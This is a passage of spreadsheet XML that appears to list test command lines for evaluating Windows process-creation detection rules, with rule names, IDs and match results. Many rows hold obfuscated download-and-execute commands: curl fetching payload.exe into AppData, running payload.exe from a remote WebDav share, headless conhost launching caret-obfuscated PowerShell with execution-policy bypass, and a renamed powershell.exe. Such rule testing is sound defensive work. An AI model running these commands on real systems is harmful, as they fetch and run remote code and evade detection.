      <c r="C1720" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1720" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1720" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F1720" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1720" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1720" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1720" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1720" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1721" ht="15.75" customHeight="1" s="42">
      <c r="A1721" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1721" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1721" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1721" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1721" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F1721" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1721" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1721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21" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1721" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1722" ht="15.75" customHeight="1" s="42">
      <c r="A1722" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1722" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1722" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1722" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1722" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F1722" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1722" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1722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22" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1722" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1723" ht="15.75" customHeight="1" s="42">
      <c r="A1723" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1723" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1723" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1723" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1723" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F1723" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1723" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1723" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1723" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1723" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1724" ht="15.75" customHeight="1" s="42">
      <c r="A1724" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1724" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1724" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1724" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1724" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F1724" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1724" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1724" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1724" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1724" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1725" ht="15.75" customHeight="1" s="42">
      <c r="A1725" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1725" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C1725" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D1725" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E1725" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F1725" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1725" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1725" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1725" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1725" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1726" ht="15.75" customHeight="1" s="42">
      <c r="A1726" s="43" t="n"/>
      <c r="B1726" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C1726" s="44" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D1726" s="44" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E1726" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" " net use https://192.0.2.1/share &amp; start \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F1726" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1726" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1726" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1726" s="44" t="n"/>
      <c r="J1726" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1726" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1727" ht="15.75" customHeight="1" s="42">
      <c r="A1727" s="43" t="n"/>
      <c r="B1727" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C1727" s="44" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D1727" s="44" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E1727" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" " net use https://192.0.2.1/share &amp; start \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F1727" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1727" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1727" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1727" s="44" t="n"/>
      <c r="J1727" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1727" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1728" ht="15.75" customHeight="1" s="42">
      <c r="A1728" s="43" t="n"/>
      <c r="B1728" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C1728" s="44" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D1728" s="44" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E1728" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "net use http://192.0.2.1/share; Start-Process \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F1728" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1728" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1728" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1728" s="44" t="n"/>
      <c r="J1728" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1728" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1729" ht="15.75" customHeight="1" s="42">
      <c r="A1729" s="43" t="n"/>
      <c r="B1729" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C1729" s="44" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D1729" s="44" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E1729" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "net use http://192.0.2.1/share; Start-Process \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F1729" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1729" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1729" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1729" s="43" t="n"/>
      <c r="J1729" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1729" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1730" ht="15.75" customHeight="1" s="42">
      <c r="A1730" s="43" t="n"/>
      <c r="B1730" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_net_use_and_exec_combo</t>
        </is>
      </c>
      <c r="C1730" s="44" t="inlineStr">
        <is>
          <t>Suspicious File Execution From Internet Hosted WebDav Share</t>
        </is>
      </c>
      <c r="D1730" s="44" t="inlineStr">
        <is>
          <t>f0507c0f-a3a2-40f5-acc6-7f543c334993</t>
        </is>
      </c>
      <c r="E1730" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "net use http://192.0.2.1/share; Start-Process \\192.0.2.1\DavWWWRoot\payload.exe "</t>
        </is>
      </c>
      <c r="F1730" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1730" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1730" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1730" s="43" t="n"/>
      <c r="J1730" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1730" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1731" ht="15.75" customHeight="1" s="42">
      <c r="A1731" s="43" t="n"/>
      <c r="B1731" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_no_space_execution</t>
        </is>
      </c>
      <c r="C1731" s="44" t="inlineStr">
        <is>
          <t>Cmd.EXE Missing Space Characters Execution Anomaly</t>
        </is>
      </c>
      <c r="D1731" s="44" t="inlineStr">
        <is>
          <t>a16980c2-0c56-4de0-9a79-17971979efdd</t>
        </is>
      </c>
      <c r="E1731" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c^" whoami</t>
        </is>
      </c>
      <c r="F1731" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1731" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1731" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1731" s="43" t="n"/>
      <c r="J1731" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1731" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1732" ht="15.75" customHeight="1" s="42">
      <c r="A1732" s="43" t="n"/>
      <c r="B1732" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1732" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1732" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1732" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "C:\Windows\System32\WindowsPowerShell\v1.0\pwsh.exe -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F1732" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1732" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1732" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1732" s="43" t="n"/>
      <c r="J1732" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1732" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1733" ht="15.75" customHeight="1" s="42">
      <c r="A1733" s="43" t="n"/>
      <c r="B1733" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1733" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1733" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1733" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1733" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1733" s="43" t="n"/>
      <c r="J1733" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1733" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1734" ht="15.75" customHeight="1" s="42">
      <c r="A1734" s="43" t="n"/>
      <c r="B1734" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1734" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1734" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1734" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --heADLEss "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1734" s="43" t="n"/>
      <c r="J1734" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1734" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1735" ht="15.75" customHeight="1" s="42">
      <c r="A1735" s="43" t="n"/>
      <c r="B1735" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1735" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1735" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1735" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1735" s="43" t="n"/>
      <c r="J1735" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1735" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1736" ht="15.75" customHeight="1" s="42">
      <c r="A1736" s="43" t="n"/>
      <c r="B1736" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1736" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1736" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1736" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLESs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1736" s="43" t="n"/>
      <c r="J1736" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1736" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1737" ht="15.75" customHeight="1" s="42">
      <c r="A1737" s="43" t="n"/>
      <c r="B1737" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1737" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1737" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1737" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLeSs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1737" s="44" t="n"/>
      <c r="J1737" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1737" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1738" ht="15.75" customHeight="1" s="42">
      <c r="A1738" s="43" t="n"/>
      <c r="B1738" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1738" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1738" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1738" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlesS "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1738" s="44" t="n"/>
      <c r="J1738" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1738" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1739" ht="15.75" customHeight="1" s="42">
      <c r="A1739" s="43" t="n"/>
      <c r="B1739" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1739" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1739" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1739" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1739" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1739" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1739" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1740" ht="15.75" customHeight="1" s="42">
      <c r="A1740" s="43" t="n"/>
      <c r="B1740" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1740" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1740" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1740" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --heADLEsS not_ps.exe -CommaND Get-Process</t>
        </is>
      </c>
      <c r="F1740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1740" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1740" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1740" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1741" ht="15.75" customHeight="1" s="42">
      <c r="A1741" s="43" t="n"/>
      <c r="B1741" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1741" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1741" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1741" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLeSs not_ps.exe -COMMAnd Get-Process</t>
        </is>
      </c>
      <c r="F1741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1741" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1741" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1741" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1742" ht="15.75" customHeight="1" s="42">
      <c r="A1742" s="43" t="n"/>
      <c r="B1742" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1742" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1742" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1742" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLESs not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1742" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1742" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1742" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1742" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1742" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1743" ht="15.75" customHeight="1" s="42">
      <c r="A1743" s="43" t="n"/>
      <c r="B1743" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1743" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1743" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1743" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe /"-headless" not_ps.exe -COmMANd Get-Process</t>
        </is>
      </c>
      <c r="F1743" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1743" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1743" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1743" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1743" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1743" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1744" ht="15.75" customHeight="1" s="42">
      <c r="A1744" s="43" t="n"/>
      <c r="B1744" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1744" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1744" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1744" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmmaNd Get-Process</t>
        </is>
      </c>
      <c r="F1744" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1744" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1744" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1744" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1744" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1744" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1745" ht="15.75" customHeight="1" s="42">
      <c r="A1745" s="43" t="n"/>
      <c r="B1745" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1745" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1745" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1745" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1745" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1745" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1745" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1745" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1745" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1745" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1746" ht="15.75" customHeight="1" s="42">
